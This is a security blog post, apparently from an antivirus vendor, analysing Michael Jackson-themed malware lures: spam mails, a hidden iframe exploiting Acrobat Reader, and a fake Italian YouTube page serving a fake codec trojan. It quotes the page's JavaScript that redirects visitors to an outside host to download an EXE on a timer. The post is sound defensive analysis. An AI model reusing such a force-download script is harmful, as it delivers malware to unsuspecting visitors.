International MJ Conspiracies With a Payload

Yes, sadly we’re still talking about people taking advantage of Michael Jackson’s death.

This week, we’ve seen a rise in malware purporting to show images and video leading up to Michael’s death — many malware groups around the world appear to be getting in on the act.

MJ X-Files Mail Message
MJ X-Files Mail Message
MJ X-Files Web Content
MJ X-Files Web Content

Anyone taking the standard precautions shouldn’t have difficulty avoiding this one — just make sure Javascript is disabled by default (so you don’t get infected by Mal/ObfJS-BP as found in the 1×1 iFrame — it tries to download and run the EXE via an old Acrobat Reader vulnerability), and don’t run the linked EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea, right?) and get infected with Troj/ZBot-GJ.

While most of the malware is following this format, the Italians are getting a bit more creative:

MJ Italian Video Message
MJ Italian Video Message

For those of you following along who don’t read Italian, my rough translation of the text is as follows:

The whole world was devastated when and Michael Jackson was found dead.
His death is surrounded with mystery; no one knows what happened, only that the mega star is dead.
But not just that. The following video clip shows Michael’s last moments and the cruel truth about his death.
Watch it and do not forget to leave a flower on Michael’s grave.
SHOCKING IMAGES! This video is not suited for children under the age of 16

This message contains a link to the following site:

"Youtube" missing codec warning

The site, purporting to be an Italian YouTube site, throws up an error saying that you need to update your Flash player to view the video… with a download link to fake Codec malware Troj/ZBot-GK. It also contains the following Javascript code that I found very interesting:

function doDownload() {
//Genera il link al file zippato da scaricare
(tr. Generate the link to the zipped file to download)
location.href = "http://youtube****.com/Codec/120.exe";

//Fa partire il download dopo 10 secondi da quando
//l’intermprete JavaScript ha rilevato la funzione
(tr. The download starts 10 seconds after the JavaScript interpreter has taken over the function)
window.setTimeout(“doDownload()”, 4000);

This associated code essentially forces the linked codec to download and possibly run after ten seconds of inactivity on the page. What I find interesting is that the script is well formatted and commented in Italian, and appears to be designed to force download a zip file. This implies that you can expect to see other Italian-targeted malware of this kind in the future.

You’re still safe as long as you keep Javascript disabled for untrusted websites and don’t download the EXE. But downloading the “update” can be a bit more tempting than the previous example.

Not to worry… Sophos blocks the e-mails, the websites, and the malware, so reading this blog is likely the closest you’ll come to this sordid display of opportunism.